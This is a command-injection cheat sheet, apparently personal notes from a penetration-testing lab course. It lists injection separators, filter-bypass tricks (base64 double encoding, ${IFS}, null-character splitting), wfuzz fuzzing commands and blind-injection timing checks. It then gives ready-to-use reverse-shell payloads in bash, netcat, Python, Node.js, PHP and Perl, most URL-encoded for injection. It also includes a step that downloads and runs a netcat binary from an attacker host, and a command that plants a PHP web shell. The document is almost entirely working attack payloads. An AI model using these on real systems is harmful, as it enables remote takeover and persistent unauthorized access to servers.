Command Injections

Possible command separation on linux

;         - executing sequentialy
&&        - the second command will only run if the first is successful
||        - the second command will only run if the first is unsuccessful
|         - pipe, i.e. the output of first command is sent as input to the second command
\n (0x0A) - alternative to ';'

Some examples

  | ping -i 30 127.0.0.1 |  
  | ping -n 30 127.0.0.1 |  
  & ping -i 30 127.0.0.1&  
  & ping -n 30 127.0.0.1&  
  ; ping -i 30 127.0.0.1;  
  %0a ping -i 30 127.0.0.1 %0a  
  ping 127.0.0.1

Command inclusion in a statement, executed inline

`cmd`
$(cmd)

Bypass with null character

$() - null character, e.g.: wh$()oami

Bypass with base64 encoding

echo "cat /etc/passwd" |base64
Y2F0IC9ldGMvcGFzc3dkCg==

http://<url>/php/blocklisted.php?ip=127.0.0.1;`echo%20%22Y2F0IC9ldGMvcGFzc3dkCg==%22%20|base64%20-d`

Command Injection with WFUZZ:

# note: refine this request with --hh based on the responses
wfuzz -c -z file,/home/kali/command_injection_custom.txt --hc 404 http://<url>/php/blocklisted.php?ip=127.0.0.1FUZZ

# identify capabilities on target machine
wfuzz -c -z file,/home/kali/capability_checks_custom.txt --hc 404 "http://<url>:80/php/index.php?ip=127.0.0.1;which FUZZ"

wfuzz -c -z file,/usr/share/seclists/Fuzzing/command-injection-commix.txt -d "box=127.0.0.1FUZZ&submitt=submit" --hc 404 "http://192.168.201.15/index.php"

Blind Command Injection

# check how long it takes to execute baseline request and then repeat it with a sleep
time curl http://<url>:80/php/blind.php?ip=127.0.0.1

time curl "http://<url>:80/php/blind.php?ip=127.0.0.1;sleep%2020"

Revshell examples

Reverse Shell example with encoded URL

curl "http://<url>/nodejs/index.js?ip=127.0.0.1|bash+-c+'bash+-i+>%26+/dev/tcp/192.168.45.225/9090+0>%261'"

Base64 encoded

# base64 encoded
# run:
echo "echo $(echo 'bash -i >& /dev/tcp/192.168.45.158/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'

# use the output

Netcat

curl "http://<url>:80/nodejs/index.js?ip=127.0.0.1|/bin/nc%20-nv%20192.168.45.225%209090%20-e%20/bin/bash"

Python

curl "http://<url>/php/index.php?ip=127.0.0.1;python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.49.51%22,9090));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27"

# but better to URL encode it all 
curl "http://<url>/php/index.php?ip=127.0.0.1%3b%70%79%74%68%6f%6e%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%34%35%2e%32%32%35%22%2c%39%30%39%30%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%22%2f%62%69%6e%2f%73%68%22%2c%22%2d%69%22%5d%29%3b%27"

Node.js

http://<url>:80/nodejs/index.js?ip=127.0.0.1|echo "require('child_process').exec('nc -nv 192.168.45.225 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js

PHP

php -r '$sock=fsockopen("192.168.49.51",9090);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

# example
http://<url>/php/index.php?ip=127.0.0.1;php -r "system(\"bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'\");"

# URL-encoded example
http://<url>/php/index.php?ip=127.0.0.1;php%20-r%20%22system(%5C%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.49.51%2F9090%200%3E%261%27%5C%22)%3B%22

Perl

perl -e 'use Socket;$i="192.168.49.51";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# URL-encoded example
http://<url>/nodejs/index.js?ip=127.0.0.1|perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.49.51%22%3B%24p%3D9090%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27

File Transfer

curl http://192.168.49.51:80/nc -o /var/tmp/nc ; chmod 755 /var/tmp/nc ; /var/tmp/nc -nv 192.168.49.51 9090 -e /bin/bash

# Example
http://<url>/php/file_transfer_exercise.php?ip=127.0.0.1;curl%20http://192.168.45.225:80/nc%20-o%20/var/tmp/nc%20;%20chmod%20755%20/var/tmp/nc%20;%20/var/tmp/nc%20-nv%20192.168.45.225%209090%20-e%20/bin/bash

Web Shell

echo+"<pre><?php+passthru(\$_GET['cmd']);+?></pre>"+>+/var/www/html/webshell.php

# URL-encoded example
http://<url>:80/php/index.php?ip=127.0.0.1;echo+%22%3Cpre%3E%3C?php+passthru(\$_GET[%27cmd%27]);+?%3E%3C/pre%3E%22+%3E+/var/www/html/webshell.php